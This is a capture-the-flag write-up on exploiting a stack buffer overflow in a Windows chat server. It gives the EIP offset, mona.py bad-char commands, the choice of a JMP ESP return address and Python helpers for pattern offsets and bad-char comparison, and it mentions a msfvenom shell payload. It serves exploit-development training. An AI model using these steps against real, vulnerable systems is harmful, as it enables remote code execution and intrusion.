The purpose of this CTF is to reverse engineer a chat program and write a script that exploits a Windows machine. It is a great example of a stack buffer overflow, so I recommend you try this one 😉
I decided to check the FTP service first. In this case you can log in to the FTP service anonymously. Before downloading the files, remember to switch the transfer type to binary so the files are not corrupted.
Now you have to transfer chatserver.exe and the .dll file to your Windows VM. I used Windows 7 Enterprise 64-bit. Make sure the network is configured correctly, because the Kali VM and the Windows VM must be on the same network. Turn off Defender and the firewall before running the .exe file.
After a quick recon of chatserver I decided to try a stack buffer overflow on the message field. As you can see below, EAX, ESP, EBP and EIP have all been overwritten with “B” (0x42). Since EIP has been overwritten with “B”, it is possible to control this pointer and redirect execution to something malicious. I use Immunity Debugger to reverse engineer this executable.
msf-pattern_create generates a long non-repeating pattern, so the value that lands in a register tells you exactly which bytes of the input reached it.
We can see that the pointer (EIP) has been overwritten with 31704330, so we can look up the offset of that value in the pattern.
The offset is 2012, which means the 2013th byte is the beginning of EIP. Below I have written an exploit which communicates with chatserver.exe.
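To make the offset calculation reproducible, here is an added example (not code from the original write-up) that re-implements the pattern logic of msf-pattern_create and msf-pattern_offset in plain Python: it builds the same Aa0Aa1… pattern, and maps the EIP value 31704330 shown in the debugger back to its position. Function names are my own; the only input taken from the write-up is the register value.

```python
# Added example (not part of the original write-up): a pure-Python reproduction
# of the msf-pattern_create / msf-pattern_offset logic, used to recompute the
# EIP offset from the crashed register value 31704330.
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> bytes:
    """Generate the Metasploit-style cyclic pattern Aa0Aa1...Az9Ba0...
    truncated to `length` bytes (20280 bytes before it would repeat)."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(register_value: str, length: int = 20280) -> int:
    """Map a register value as displayed by the debugger (e.g. '31704330')
    back to the byte offset in the pattern that produced it.

    x86 is little-endian, so the 4 pattern bytes appear reversed in the
    register: 0x31704330 -> bytes 30 43 70 31 -> the ASCII text '0Cp1'.
    Returns -1 if the value does not occur in the pattern."""
    needle = struct.pack("<I", int(register_value, 16))
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    eip = "31704330"  # value observed in EIP in the write-up
    print(f"EIP {eip} corresponds to pattern bytes {struct.pack('<I', int(eip, 16))!r}")
    print(f"offset = {pattern_offset(eip)}")  # 2012, matching msf-pattern_offset
```

Running it prints offset 2012, the same value msf-pattern_offset reported; the 2013th byte of the message is therefore the first byte that lands in EIP.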
PoC of crashing the application through the buffer overflow: the message was long enough to overwrite other variables.
EIP has been overwritten with 5858, which is “X” (0x58). The msg variable contains 2012 characters followed by XXXX.
Now we can start looking for bad chars, so I added the full list of bad chars excluding \x00.
The easiest way to look for bad chars is to use mona.py, which I added to Immunity Debugger.
I changed the payload, because the .encode() function probably shortens the variable and it doesn’t work. So instead of encoding I just added a “b” prefix before every line of the badchars variable.
I ran the chatserver and the script again and followed ESP in the dump.
In the hex dump you can check manually whether every char is there, but the fastest way is to use mona.
Now you have to change the working folder and create the mona bytearray:
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
Run the program, execute the exploit and then run in Immunity Debugger:
!mona compare -f C:\mona\chatserver\bytearray.bin -a
There are only 2 rows in which every protection is disabled (all False): one is the .dll and the other is the .exe file. In this case, I am going to target the .dll.
Now I want the address I found to become the EIP value, so I need to modify the exploit code. This address must be written backwards (little-endian byte order).
I use the debugger to verify that this address really is a JMP ESP instruction.
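The two manual steps above, checking that every byte of the bytearray survived in memory at ESP and making sure the chosen address is written backwards and contains no bad char, can be reproduced without mona. The following is an added example, not code from the write-up or from mona.py: `compare()` does what `!mona compare` reports, and `pack_address()` encodes a 32-bit address little-endian and refuses it if any of its bytes is a known bad char. The memory dump and the address 0x10203040 are constructed for the demo, not captured from chatserver.

```python
# Added example (not part of the original write-up): plain-Python equivalents
# of `!mona bytearray` / `!mona compare`, plus little-endian packing of the
# return address with a bad-char check.
import struct


def make_bytearray(exclude: bytes = b"\x00") -> bytes:
    """All 256 byte values in order, minus those already known to be bad
    (the equivalent of `!mona bytearray -b "\\x00"`)."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(sent: bytes, dumped: bytes) -> list:
    """Compare the bytes we sent with the bytes found in memory at ESP.

    Returns (offset, expected, found) for every byte that was altered or
    truncated (found is None past the end of the dump), like the
    `!mona compare` report. Only the first corrupted byte of a run is a
    trustworthy bad char: everything after it may be shifted or dropped by
    the server's string handling, so exclude it, rebuild the array and re-run.
    """
    diffs = []
    for i, expected in enumerate(sent):
        found = dumped[i] if i < len(dumped) else None
        if found != expected:
            diffs.append((i, expected, found))
    return diffs


def first_bad_char(sent: bytes, dumped: bytes):
    """Return the first byte value that did not survive, or None if all did."""
    diffs = compare(sent, dumped)
    return diffs[0][1] if diffs else None


def pack_address(addr: int, bad_chars: bytes = b"\x00") -> bytes:
    """Encode a 32-bit address little-endian (i.e. 'written backwards') for
    the EIP slot, and refuse it if any byte is a known bad char: the address
    must survive the same string handling as the rest of the message."""
    packed = struct.pack("<I", addr)
    clash = [b for b in packed if b in bad_chars]
    if clash:
        raise ValueError(f"address {addr:#010x} contains bad char(s) {clash}")
    return packed


# Constructed demo data (not a real chatserver dump): the "server" replaced
# 0x0a with 0x00, so 0x0a is the first byte that fails the comparison.
SENT = make_bytearray()
DUMPED = SENT.replace(b"\x0a", b"\x00")

if __name__ == "__main__":
    print("bytearray length:", len(SENT))          # 255 (0x00 excluded)
    print("first bad char:", hex(first_bad_char(SENT, DUMPED)))
    # Hypothetical address, chosen only so that no byte is a bad char.
    print("packed address:", pack_address(0x10203040).hex())
```

The first mismatch is the only one worth trusting per round; after excluding it with `make_bytearray(exclude=b"\x00\x0a")` the array is sent again until `compare()` returns an empty list.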
I used msfvenom to create the payload. Remember to change the IP address of the local machine to the tun0 address and to set the IP address of the CTF box.
The final exploit code is here. Remember to change the IP address to the target box.
I gained the shell and found the flag.
Thanks to this CTF I have learnt a lot of great stuff related to stack buffer overflows. It is great preparation for the OSCP buffer overflow boxes.
damn son, ur a haxXxor